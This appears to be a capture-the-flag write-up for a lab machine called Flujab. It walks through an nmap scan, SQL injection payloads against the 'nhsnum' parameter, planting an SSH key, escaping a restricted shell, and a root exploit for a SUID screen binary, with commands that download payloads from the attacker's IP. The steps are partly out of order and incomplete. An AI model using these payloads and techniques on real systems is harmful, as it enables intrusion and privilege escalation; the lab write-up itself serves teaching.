As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Tue May 16 07:23:48 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.124
Nmap scan report for 10.10.10.124
Host is up (0.038s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
8080/tcp open http-proxy
# Nmap done at Tue May 16 07:24:02 2023 -- 1 IP address (1 host up) scanned in 14.71 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
Now, by changing the cookies, we'll be able to access the cancellation page.
If we take a look back at the curl request, we'll see that the Modus cookie has the path variable set to /?smtp_config. This shows a page where we can configure the SMTP server.
There is a link to a whitelist, but right now it is empty.
Let's set an SMTP server with python.
python -m smtpd -c DebuggingServer 10.10.14.8:25
We won't be able to add our IP address as the SMTP server because the input field has a pattern configured.
But, as this restriction is from the client side, we can delete it.
Now our IP address appears in the whitelist.
Try to cancel an appointment, intercept the request with BurpSuite, and send it to the repeater. If we send the request, we'll see an email in our SMTP server.
---------- MESSAGE FOLLOWS ----------
b'Date: Wed, 17 May 2023 09:51:52 +0100'
b'To: cancelations@no-reply.flujab.htb'
b'From: Nurse Julie Walters <DutyNurse@flujab.htb>'
b'Subject: Flu Jab Appointment - Ref:NHS-943-475-5911'
b'Message-ID: <6ddc8890255fba84d597a104d800b9dd@freeflujab.htb>'
b'X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)'
b'MIME-Version: 1.0'
b'Content-Type: text/plain; charset=iso-8859-1'
b'X-Peer: 10.10.10.124'
b''
b' CANCELLATION NOTICE!'
b' ________________________'
b' '
b' VACCINATION'
b' Routine Priority'
b' ------------------'
b' REF : NHS-943-475-5911 '
b' Code : Influ-022'
b' Type : Injection'
b' Stat : CANCELED '
b' LOC : Crick026 '
b' ________________________'
b''
b' Your flu jab appointment has been canceled.'
b' Have a nice day,'
b''
b' Nurse Julie Walters'
b' Senior Staff Nurse'
b' Cricklestone Doctors Surgery'
b' NHS England.'
b' '
------------ END MESSAGE ------------
Let's try to see if the nhsnum parameter is vulnerable to SQL injection. It looks like it is vulnerable, and the current table has five columns. The third column gets represented in the email subject.
---------- MESSAGE FOLLOWS ----------
b'Date: Wed, 17 May 2023 10:10:30 +0100'
b'To: cancelations@no-reply.flujab.htb'
b'From: Nurse Julie Walters <DutyNurse@flujab.htb>'
b'Subject: Flu Jab Appointment - Ref:3'
b'Message-ID: <9d3d84021610bc21418cc2c17747d394@freeflujab.htb>'
b'X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)'
b'MIME-Version: 1.0'
b'Content-Type: text/plain; charset=iso-8859-1'
b'X-Peer: 10.10.10.124'
b''
b' CANCELLATION NOTICE!'
b' ________________________'
b' '
b' VACCINATION'
b' Routine Priority'
b' ------------------'
b" REF : ' union select 1,2,3,4,5-- - "
b' Code : Influ-022'
b' Type : Injection'
b' Stat : CANCELED '
b' LOC : Crick026 '
b' ________________________'
b''
b' Your flu jab appointment has been canceled.'
b' Have a nice day,'
b''
b' Nurse Julie Walters'
b' Senior Staff Nurse'
b' Cricklestone Doctors Surgery'
b' NHS England.'
b' '
------------ END MESSAGE ------------
Let's get the name of the database.
nhsnum=' union select 1,2,database(),4,5-- -&submit=Cancel+Appointment
The most interesting one is the admin table, with the following column names.
nhsnum=' UNION SELECT 1,2,group_concat(column_name),4,5 FROM information_schema.columns WHERE table_schema="vaccinations" AND table_name="admin"-- -&submit=Cancel+Appointment
The password hash can be cracked with crackstation.
The freeflujab.htb domain name shows the following login page on port 8080.
Once logged in, we'll see that the Notepad tool allows us to load files from the server.
We can't log in via SSH with as sysadm with the credentials that we have.
ssh sysadm@10.10.10.124
kex_exchange_identification: read: Connection reset by peer
Connection reset by 10.10.10.124 port 22
This might happen because of some SSH configuration. Load the /etc/hosts.allow file, and add our IP address and the localhost address. Then save the file.
Open a file, delete all the content, paste our public SSH key, and save it as access in /home/sysadm.
The file needs to have the right permissions to work. We can do it using Ajenti API with the /chmod endpoint.
Finally, we are able to log in via SSH.
ssh sysadm@10.10.10.124
Linux flujab 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
sysadm@flujab:~$ whoami
sysadm
As we can see, we are currently in a restricted bash.
ifconfig
-rbash: ifconfig: command not found
We can bypass this restriction easily.
ssh sysadm@10.10.10.124 bash
whoami
sysadm
Privilege Escalation
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command on our local machine:
stty size
51 236
And set the proper dimensions in the victim machine:
libhax.c: In function âdropshellâ:
libhax.c:7:5: warning: implicit declaration of function âchmodâ [-Wimplicit-function-declaration]
7 | chmod("/tmp/rootshell", 04755);
| ^~~~~
Now, let's create the rootshell.c file, which will give us the shell as root.
rootshell.c: In function âmainâ:
rootshell.c:3:5: warning: implicit declaration of function âsetuidâ [-Wimplicit-function-declaration]
3 | setuid(0);
| ^~~~~~
rootshell.c:4:5: warning: implicit declaration of function âsetgidâ [-Wimplicit-function-declaration]
4 | setgid(0);
| ^~~~~~
rootshell.c:5:5: warning: implicit declaration of function âseteuidâ [-Wimplicit-function-declaration]
5 | seteuid(0);
| ^~~~~~~
rootshell.c:6:5: warning: implicit declaration of function âsetegidâ [-Wimplicit-function-declaration]
6 | setegid(0);
| ^~~~~~~
rootshell.c:7:5: warning: implicit declaration of function âexecvpâ [-Wimplicit-function-declaration]
7 | execvp("/bin/sh", NULL, NULL);
| ^~~~~~
rootshell.c:7:5: warning: too many arguments to built-in function âexecvpâ expecting 2 [-Wbuiltin-declaration-mismatch]
Then, we'll have to transfer the libhax.so file and rootshell files to the haircut machine. Let's set a simple HTTP server with python on the current directory.
python -m http.server 80
Then, on the victim machine, let's go to the /tmp directory, and download both files from our HTTP server.
cd /tmp
wget http://10.10.14.8/libhax.so
wget http://10.10.14.8/rootshell
chmod +x *
Then go to the /etc directory on the victim machine and execute the following commands.
Finally, if we execute the rootshell file of the /tmp folder, we'll get a shell as root, and all we have to do is reap the harvest and take the root flag.
I found on exploitdb, which indicates how to get a shell as root with the screen binary with the SUID permission. First, let's create on our machine the libhax.c file, and add the following code.
